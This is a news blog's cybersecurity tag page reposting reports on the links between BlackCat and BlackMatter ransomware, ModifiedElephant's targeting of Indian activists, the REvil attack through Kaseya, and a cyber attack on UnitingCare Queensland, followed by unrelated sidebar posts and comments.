Tag: Cybersecurity

CYBERSECURITY: BlackCat You DON’T Want Crossing Your Path As It Brings Malware

Post author By @ace101
Post date 23/03/2022

This is our daily post that is shared across Twitter & Telegram and published first on here with Kindness & Love ❤️❤️ on My.Daz.blog

#AceNewsRoom With ‘Kindness & Wisdom’ Mar.22, 2022 @acebreakingnews

Ace News Room Cutting Floor 22/03/2022

Follow Our Breaking & Daily News Here As It Happens:

#AceSecurityDesk says according to The Register News Report: Cybersecurity researchers with Cisco have outlined probable links between the BlackMatter/DarkSide ransomware ring responsible for last year’s high-profile raid on the Colonial Pipeline, and an emerging ransomware-as-a-service product dubbed BlackCat: Plus: Android trojan in 100,000+ app installs, Solaris malware: The Registers Jeff BurtTue 22 Mar 2022 // 05:29 UTC

In a write-up this month, Cisco’s Talos threat intelligence unit said a domain name and IP addresses used in a BlackCat infection in December had also been used in a BlackMatter ransomware deployment three months earlier.

In addition, the team outlined tools, file names, and techniques that are common to both the BlackMatter and BlackCat ransomware variants. As a ransomware-as-a-service (RaaS) operation, BlackCat can be rented by criminal affiliates to infect and extort targets, with the malware’s developers typically getting a cut of the ransom.

Given that the affiliates are individually responsible for compromising their victims’ systems and deploying the actual ransomware binaries, “it is likely that attacks carried out by the same ransomware family may differ in techniques and procedures,” Talos’s Tiago Pereira and Caitlin Huey noted. In other words, affiliates infect victims in different ways with the same ransomware.

At the same time, RaaS operators often make training materials, general techniques, and tools available to affiliates – as shown by the documents leaked from the Conti ransomware gang – so you’d expect to see some similarities in the attacks carried out by these miscreants.

Still, each ransomware strain should have its own command-and-control (C2) systems, and yet overlapping C2 resources were seen in BlackMatter and BlackCat infections, fueling rumors of strong ties between the two. The Talos team further speculated that “a BlackMatter affiliate was likely an early adopter – possibly in the first month of operation – of BlackCat.”

This is interesting because it sheds some light on the interconnected networks of criminals menacing organizations. It’s also useful to know what to look out for when defending against or gaining early detection of this kind of ransomware.

Those rumors of a close connection began as soon as BlackCat caught the attention of cybersecurity vendors and researchers. The MalwareHunter Team tweeted about the ransomware group in December and other threat intelligence groups, such as S2W out of South Korea, reported similarities between some of configuration fields used by both BlackCat and BlackMatter.

However, there also were differences. For instance, BlackCat was written in Rust, while ransomware from both DarkSide and BlackMatter – the latter a rebranded DarkSide group – were written in C/C++, S2W wrote in an analysis.

Speaking of malware… Pradeo says it has spotted an Android app: installed more than 100,000 times from the Google Play Store that has a trojan in it called Facestealer. This socially engineers victims into handing over their Facebook login details, which are passed to a Russian server. The app in question was Craftsart Cartoon Photo Tools, which has since been removed by Google. If for some reason you have it installed, get rid of it.

Mandiant has documented the activities of a team it’s called UNC2891and its targeting of Solaris systems with backdoors dubbed TINYSHELL and SLAPSTICK and a rootkit called CAKETAP. It is believed CAKETAP was used to alter messages on ATM networks to pull off fraudulent withdrawals from banks using bogus payment cards. UNC2891, we’re told, is skilled on Unix and Linux-flavored machines, is financially motivated, and has gone for years undetected in large systems.

A BlackCat representative in a February interview with Recorded Future said the two groups had a “connection” but that BlackCat was not a rebranding of BlackMatter.

The representative also said BlackCat is an affiliate of other RaaS groups, and that they took knowledge from other outfits. If true, BlackCat is an example of vertical business expansion – controlling the upstream supply chain by making a service better suited for their needs and adding another potential avenue for revenue, the Talos researchers wrote.

Vertical expansion also is a business strategy when there is distrust in the supply chain.

“There are several cases of vulnerabilities in ransomware encryption and even of backdoors that can explain a lack of trust in RaaS,” they wrote. “One particular case mentioned by the BlackCat representative was a flaw in DarkSide/Blackmatter ransomware allowing victims to decrypt their files without paying the ransom. Victims used this vulnerability for several months, resulting in big losses for affiliates.”

Double blow

BlackCat – also known as ALPHV – is being used in double-ransomware attacks, where the files not only are encrypted but victims are threatened with public disclosure of the files if the ransom isn’t paid. BlackCat first appeared in November 2021 and has infected several companies in different parts of the world. That said, more than 30 percent of the compromises have hit US-based companies, according to Talos.

When comparing the BlackMatter intrusion in September and the BlackCat one in December, the Talos team believed the pair of cyber-attacks were run by the same affiliate. Both raids went the usual way: an initial compromise followed by exploration and data exfiltration, preparation, and then execution of the extortionware.

There were further similarities: for both the BlackMatter and BlackCat infections, the methods to achieve persistence – a reverse SSH tunnel and scheduled tasks – were the same as well as lateral movements and the C2 domain. In addition, local and domain user credentials were collected on some key systems by dumping the LSASS process memory and extracting the credentials with Microsoft Sysinternals Procdump and Dumpert.

“In both attacks, before the actual execution of the ransomware, the attackers performed several actions preparing systems to make the execution as successful as possible,” the researchers wrote. “On the day of the attack, the attacker logged in to the domain controller and opened the group policy management interface. The attackers then dropped and executed a file named ‘apply.ps1.’ We believe this script created and prepared the group policy to cause the execution of the ransomware throughout the domain.”

The researchers admitted they still don’t know how tightly related BlackCat is to BlackMatter, but that given the overlapping tools, techniques, and infrastructure of the two infections, they have “moderate confidence” that BlackMatter affiliates were probably among the early adopters of BlackCat.

“As we have seen several times before, RaaS services come and go,” they wrote. “Their affiliates, however, are likely to simply move on to a new service. And with them, many of their TTPs [techniques, tactics and procedures] are likely to persist.” ®

#AceNewsDesk report ………..Published: Mar.22: 2022:

Editor says …Sterling Publishing & Media Service Agency is not responsible for the content of external site or from any reports, posts or links, and can also be found here on Telegram: https://t.me/acenewsdaily all of our posts from Twitter can be found here: https://acetwitternews.wordpress.com/ and all wordpress and live posts and links here: https://acenewsroom.wordpress.com/ and thanks for following as always appreciate every like, reblog or retweet and free help and guidance tips on your PC software or need help & guidance from our experts AcePCHelp.WordPress.Com

Tags Breaking, Cybersecurity, Headlines, Kindness, Love❤️❤️, News, Telegram, Twitter

Ace Daily News

BREAKING: Unknown Hackers Target Indian Human Rights Activists & Lawyers

Post author By @ace101
Post date 12/02/2022

#AceNewsReport – Feb.11: A previously unknown hacking group has been linked to targeted attacks against human rights activists, human rights defenders, academics, and lawyers across India in an attempt to plant “incriminating digital evidence.”

#AceSecurityDesk says Hackers Planted Fake Digital Evidence on Devices Cybersecurity firm SentinelOne attributed the intrusions to a group it tracks as “ModifiedElephant,” an elusive threat actor that’s been operational since at least 2012, whose activity aligns sharply with Indian state interests.

“ModifiedElephant operates through the use of commercially available remote access trojans (RATs) and has potential ties to the commercial surveillance industry,” the researchers said. “The threat actor uses spear-phishing with malicious documents to deliver malware, such as NetWire, DarkComet, and simple keyloggers.”

The primary goal of ModifiedElephant is to facilitate long-term surveillance of targeted individuals, ultimately leading to the delivery of “evidence” on the victims’ compromised systems with the goal of framing and incarcerating vulnerable opponents.

Notable targets include individuals associated with the 2018 Bhima Koregaon violence in the Indian state of Maharashtra, SentinelOne researchers Tom Hegel and Juan Andres Guerrero-Saade said in a report.

The attack chains involve infecting the targets — some of them multiple times in a single day — using spear-phishing emails themed around topics related to activism, climate change, and politics, and containing malicious Microsoft Office document attachments or links to files hosted externally that are weaponized with malware capable of taking control of victim machines.

“The phishing emails take many approaches to gain the appearance of legitimacy,” the researchers said. “This includes fake body content with a forwarding history containing long lists of recipients, original email recipient lists with many seemingly fake accounts, or simply resending their malware multiple times using new emails or lure documents.”

Also distributed using phishing emails is an unidentified commodity trojan targeting Android that enables the attackers to intercept and manage SMS and call data, wipe or unlock the device, perform network requests, and remotely administer the infected devices. SentinelOne characterized it as an “ideal low-cost mobile surveillance toolkit.”

“This actor has operated for years, evading research attention and detection due to their limited scope of operations, the mundane nature of their tools, and their regionally- specific targeting,” the researchers said.

#AceNewsDesk report …………..Published: Feb.11: 2022:

Editor says …Sterling Publishing & Media Service Agency is not responsible for the content of external site or from any reports, posts or links, and can also be found here on Telegram: https://t.me/acenewsdaily all of our posts fromTwitter can be found here: https://acetwitternews.wordpress.com/ and all wordpress and live posts and links here: https://acenewsroom.wordpress.com/and thanks for following as always appreciate every like, reblog or retweet and free help and guidance tips on your PC software or need help & guidance from our experts AcePCHelp.WordPress.Com

Tags Cybersecurity, India, News, Telegram, Twitter

Ace Daily News

FEATURED: #Cybersecurity Report: An affiliate of Russia’s notorious REvil gang, best known for extorting $US11 million ($15 million) from meat processor JBS earlier this year, infected thousands of victims in at least 17 countries on Friday #AceNewsDesk report

Post author By @ace101
Post date 06/07/2021

#AceSecurityReport – July.05: Cybersecurity experts are continuing to work to stem the impact of what may be the single biggest global ransomware attack of its kind on record.

#AceSecurityDesk says that on Friday we published this post over this Ransomeware attack and this follow up is the latest details that thousands of companies in 17 countries were infected and thousands of people became victims

IT security experts say it’s no coincidence the attack was launched at the beginning of the US Fourth of July weekend.(ABC News: Nic MacBean)

An affiliate of Russia’s notorious REvil gang, best known for extorting $US11 million ($15 million) from meat processor JBS earlier this year, infected thousands of victims in at least 17 countries on Friday.

Miami-based IT firm Kaseya, which was the initial target of the attack, said fewer than 60 of its customers had been “directly affected”.

But the full impact of the intrusion is still coming into focus, in part because the Kaseya software tool commandeered by the cyber criminals is used by so-called managed service providers, which handle back-office IT work like like installing updates for other businesses.

In some cases, chain reactions fed more widespread disruption.

The Swedish Coop grocery store chain had to close hundreds of stores on Saturday because its cash registers are run by Visma Esscom, which manages servers for a number of Swedish businesses and in turn uses Kaseya.

JBS Foods paid the equivalent of $US11 million to end a five-day cyber attack that halted its operations around the world last month.(ABC News: Jim Malo)

Brett Callow, a ransomware expert at the cybersecurity firm Emsisoft, said he was unaware of any previous ransomware supply-chain attack on this scale.

There have been others, but they were fairly minor, he said.

The FBI said it was investigating the attack, along with the federal Cybersecurity and Infrastructure Security Agency, but added that “the scale of this incident may make it so that we are unable to respond to each victim individually”.

Deputy national security advisor Anne Neuberger later issued a statement saying President Joe Biden had “directed the full resources of the government to investigate this incident”, and urged all who believed they were compromised to alert the FBI.

On Saturday Mr Biden had suggested the US would respond if the Kremlin was found to be involved.

The attack came less than a month after Mr Biden pressed Russian President Vladimir Putin to stop providing safe haven to REvil and other ransomware gangs whose attacks the US deems a national security threat.

Vladimir Putin and Joe Biden discussed Russia’s treatment of cybercriminals during their meeting last month. (AP: Peter Klaunzer/Swiss Federal Office of Foreign Affairs)

Mostly smaller business affected

The businesses and public agencies hit by the latest attack included financial services, travel and leisure and the public sector, but few large companies were involved, cybersecurity firm Sophos reported.

Ransomware criminals break into networks and sow malware that cripples networks on activation by scrambling all their data. Victims get a decoder key when they pay up.

Kaseya chief executive Fred Voccola estimated the number of total victims to be in the low thousands, mostly small businesses like “dental practices, architecture firms, plastic surgery centres, libraries, things like that”.

Mr Voccola said that only between 50 to 60 of the company’s 37,000 customers were compromised.

But he said 70 per cent of those were managed service providers who used the company’s software to manage multiple customers.

The program automates the installation of software and security updates and manages backups and other vital tasks.

Cybersecurity firm ESET identified victims in at least 17 countries, including the United Kingdom, South Africa, Canada, Argentina, Mexico, Indonesia, New Zealand and Kenya.

Timing no coincidence

Cybersecurity researcher Jake Williams, president of Rendition Infosec, said he was already working with six companies hit by the ransomware.

It was no accident it happened before the Fourth of July weekend, when IT staffing was generally thin in the US, he added.

“There’s zero doubt in my mind that the timing here was intentional,” he said.

Many victims in the US may not learn of it until they are back at work on Monday.Ransomware attacks on rise in agribusinesses sectorThe agriculture industry is being urged to beef up IT security systems with “a doubling in each quarter” of cyber attacks against the sector.

The vast majority of end customers of managed service providers “have no idea” what kind of software is used to keep their networks humming, said Mr Voccola.

Kaseya said it sent a detection tool to nearly 900 customers on Saturday night.

John Hammond of Huntress Labs, one of the first cybersecurity firms to sound the alarm on the attack, said he had seen $US5 million and $US500,000 demands by REvil for the decryptor key needed to unlock scrambled networks. The smallest amount demanded appears to have been $US45,000.

This is not the first ransomware attack to target managed services providers.

In 2019, criminals hobbled the networks of 22 Texas municipalities through one. That same year, 400 US dental practices were crippled in a separate attack.

#AceNewsDesk report ………Published: July.05: 2021:

Information provided by: #AceSecurityDesk/AP/Reuters/various security firms/

Editor says …Sterling Publishing & Media Service Agency is not responsible for the content of external site or from any reports, posts or links, and can also be found here on Telegram: https://t.me/acenewsdaily all of our posts fromTwitter can be found here: https://acetwitternews.wordpress.com/ and all wordpress and live posts and links here: https://acenewsroom.wordpress.com/and thanks for following as always appreciate every like, reblog or retweet and free help and guidance tips on your PC software or need help & guidance from our experts AcePCHelp.WordPress.Com

Tags Cybersecurity, U.S News

Ace Daily News

(AUSTRALIA) JUST IN: UnitingCare Queensland has been the victim of a cyber attack, affecting its hospitals and aged care homes #AceSecurityDesk report

Post author By @ace101
Post date 27/04/2021

@acenewsservices

#AceSecurityReport – Apr.27: The healthcare provider said it was affected by a cyber incident on Sunday, and its digital and technology systems were currently inaccessible:

UnitingCare, which runs Wesley and St Andrew’s Hospitals in Brisbane, hit by cyber attack: ‘The organisation runs the Wesley and St Andrew’s Hospitals in Brisbane, St Stephen’s Hospital in Hervey Bay and the Buderim Private Hospital on the Sunshine Coast, and dozens of aged care and disability services throughout the state’ ABC Radio interview with Head of ACSC

ABC News: Posted 4h ago, updated 4h ago

The Wesley Hospital is one of the services run by UnitingCare.(Wikimedia: Commander Keane)

It has contacted the Australian Cyber Security Centre (ACSC) and technical and forensic advisors are working on the outage.

Manual back-ups are now in place, and some services are being rescheduled.

In a statement, UnitingCare Queensland said it did not know when the problem would be resolved, but it was committed to keeping its people, patients, clients and residents informed and safe.

A spokesperson for the organisation confirmed the charity’s email system was impacted, with some staff having to use private email accounts.

In August last year the ACSC issued a statement warning of specific ransomware known as Maze that was potentially being used to target aged care and health sectors.

The ACSC statement said the sectors were considered “lucrative targets” because of the sensitive personal and medical information collected by the sectors.

“The Maze ransomware is designed to lock or encrypt an organisation’s valuable information so that it can no longer be used, and has been observed being used alongside other tools which steal important business information,” the statement said.

“Cybercriminals may then threaten to post this information online unless a further ransom is paid. This is especially effective in the aged care and healthcare sectors.”

#AceSecurityDesk report ………Published: Apr.27: 2021:

Editor says #AceNewsDesk reports by https://t.me/acenewsdaily and all our posts, also links can be found at here for Twitter and Live Feeds https://acenewsroom.wordpress.com/ and thanks for following as always appreciate every like, reblog or retweet and free help and guidance tips on your PC software or need help & guidance from our experts AcePCHelp.WordPress.Com

Tags Australian News, Cybersecurity

Jesus ⚜️ 🙏 ⚜️

We need to be sincere in our hearts when it comes to our relationship with God. There is no need for us to feel as if we need to pretend in God’s presence. God knows us more than we know ourselves. When we commune with Him and act like we are without any worries or thoughts, we are only being hypocrites. Our hypocrisy will prevent us from totally connecting with God. God pushes us to come to him wholeheartedly, ready to fellowship with him without any restrictions or doubts.

In all honesty, God is the only one we can express the depths of our hearts to in confidence. When we tell people, there is a high chance that we will be let down. But when we tell God, there is a definite possibility that we will receive peace, assurance, and the wisdom to handle the situation.

Our hearts have been cleansed by the blood of Jesus, making us free from the power of sin. This allows us to come to God with a clear conscience, free of guilt and shame. We have been purified by Christ. This is what this bible verse, Hebrews 10:22-23, is trying to tell us. We have been assured of our purification and there is nothing that should convince us otherwise.

As Christians, we have become new creations in Christ. We no longer define ourselves by our sinful nature. We identify ourselves in Jesus Christ.

We are to hold on to the faith with all our heart, mind, and soul. Many factors in the world will try to discourage us from having faith in God. We can not afford to pay attention to any of them. This is why we need to remain rooted in God’s word.

Jesus’s

This is the Word of the Lord amen 🙏

Australian man accused of the murder of 23-year-old Victorian woman Hannah McGuire has faced a packed courtroom in Ballarat.

AceBreakingNews – UPDATE – Hannah McGuire murder accused Lachlan Young faces Ballarat court @acenewsservices Sebastopol resident Lachlan Young, 21, is facing one count of murder following the discovery of Ms McGuire’s body in a burnt-out car at Scarsdale last week. Ballarat Magistrates’ Court heard it was Mr Young’s first time in custody. Police prosecutor Steve […]

Issy Paris

Its Caritas Amen

The majority of fossil fuel companies produce more emissions after the Paris Climate Change Agreement than before, according to a report

GlobalWarming & ClimateChange News Desk – Most fossil fuel companies have produced more emissions in the seven years since the Paris Agreement was signed than the seven years before the major climate pact, a new report reveals. @acenewsservices Ace Press News From Cutting Room Floor: Published: Apr.08: 2024: Friday 5 Apr 2024 at 5:50AM: TELEGRAM […]

UK Detectives Manhunt for Suspect Investigating the Murder of a Woman in Bradford have formally released her identity

Ace Press News From Cutting Room Floor: Published: Apr.08: 2024: West Yorkshire Police News: Published Monday, 8 April, 2024: TELEGRAM Ace Daily News Link https://t.me/+PuI36tlDsM7GpOJe @acenewsservices Kulsuma Akter, 27, from Oldham, died after being stabbed in Westgate in Bradford at the junction with Drewton Road at 3:21 pm. on Saturday (6 April). Kulsuma was taken to […]

What is being done to crack down on text scammers in Australia?

AceSecurityDesk – You’ve probably noticed scammers love sending text messages: It’s the most popular scam delivery method by far, according to figures from the consumer watchdog. @acenewsservices Ace Press News From Cutting Room Floor: Published: Apr.08: 2024: ABC Security News: TELEGRAM Ace Daily News Link https://t.me/+PuI36tlDsM7GpOJe By exploiting our trust in institutions, whether it’s the bank, […]

More than 90 people have died after a ferry sank off the north coast of Mozambique, local authorities say.

AceBreakingNews – Officials in Nampula province said five people had been rescued of the around 130 believed to have been on board. @acenewsservices Ace Press News From Cutting Room Floor: Published: Apr.08: 2024: By Jose Tembe & Ido Vock: BBC News, Maputo & London with Additional reporting by Natasha Booty: TELEGRAM Ace Daily News Link https://t.me/+PuI36tlDsM7GpOJe […]

More than a million older 4G mobile phones at risk of being blocked from making triple-0 calls in 3G shutdown

AceBreakingNews – More than a million mobile phones could be cut off from calling triple-0 within months, and ABC can exclusively reveal, raising alarm about Australia’s readiness for the imminent shutdown 3G network. Ace Press News From Cutting Room Floor: Published: Apr.08: 2024: TELEGRAM Ace Daily News Link https://t.me/+PuI36tlDsM7GpOJe Telstra is due to switch off its […]

Australias Act Supreme Court documents reveal details of covert police operation as second man committed to stand trial over 1999 murder of Irma Palasics

AceBreakingNews – New details have emerged about a covert police operation set up to solve the cold case investigation into the murder of Canberra woman Irma Palasics. @acenewsservices Ace Press News From Cutting Room Floor: Published: Apr.08: 2024: TELEGRAM Ace Daily News Link https://t.me/+PuI36tlDsM7GpOJe @acenewsservices The revelation comes as the second man charged with Mrs Palasics’s […]

Feature Title

Life is a complex journey that is full of ups and downs, just like a bunch of roses. Each rose is unique and has its own story to tell. Some roses sparkle like raindrops, reflecting the joy and happiness that life can bring. These roses are the ones that make us smile and feel grateful for the beauty around us.Other roses fade away when there's no sun, reminding us of the challenges we may face in life. These roses symbolize the tough times that we all must endure, but also teach us to appreciate the good times even more.There are also roses that just fade away in time, reminding us of the importance of cherishing every moment we have. These roses are a poignant reminder of the fleeting nature of life and how we must make the most of every opportunity.Some roses dance in many colors, bringing a sense of vibrancy and energy to our lives. These roses represent the excitement and adventure that we can experience when we step outside of our comfort zones.Others droop with hanging wings, reminding us of the fragility of life. These roses teach us to be gentle with ourselves and with others, and to show kindness and compassion wherever we can.Finally, there are roses that make you fall in love with their beauty. These roses are the ones that take your breath away and leave you in awe. They remind us that beauty is in the eye of the beholder, and that we all have our own unique perspectives on what is truly beautiful.Ultimately, life is a journey that we must all navigate, and one thing is for sure - we will not get out alive. So let's cherish every moment, and appreciate the beauty that surrounds us, just like a bunch of roses.

serdar fırat on Jesus ⚜️🙏⚜️03/04/2024
❤️✝️❤️
Peace Truth on Forever 🌟02/04/2024
👏🙏👏
pk 🌎 on Indigenous Australian art is celebrated globally. But who reaps the profits?02/04/2024
NICE and INTERESTING post 💯 Blessed and Happy day 🌄 Greetings from 🇪🇸 I GROW TOGETHER 🫂 PK 🌎
Peace Truth on Old Testament02/04/2024
I completely understand that letting go of something or someone can be challenging, but please know that forgiveness can be…
serdar fırat on Lord 👑02/04/2024
✝️Amen ✝️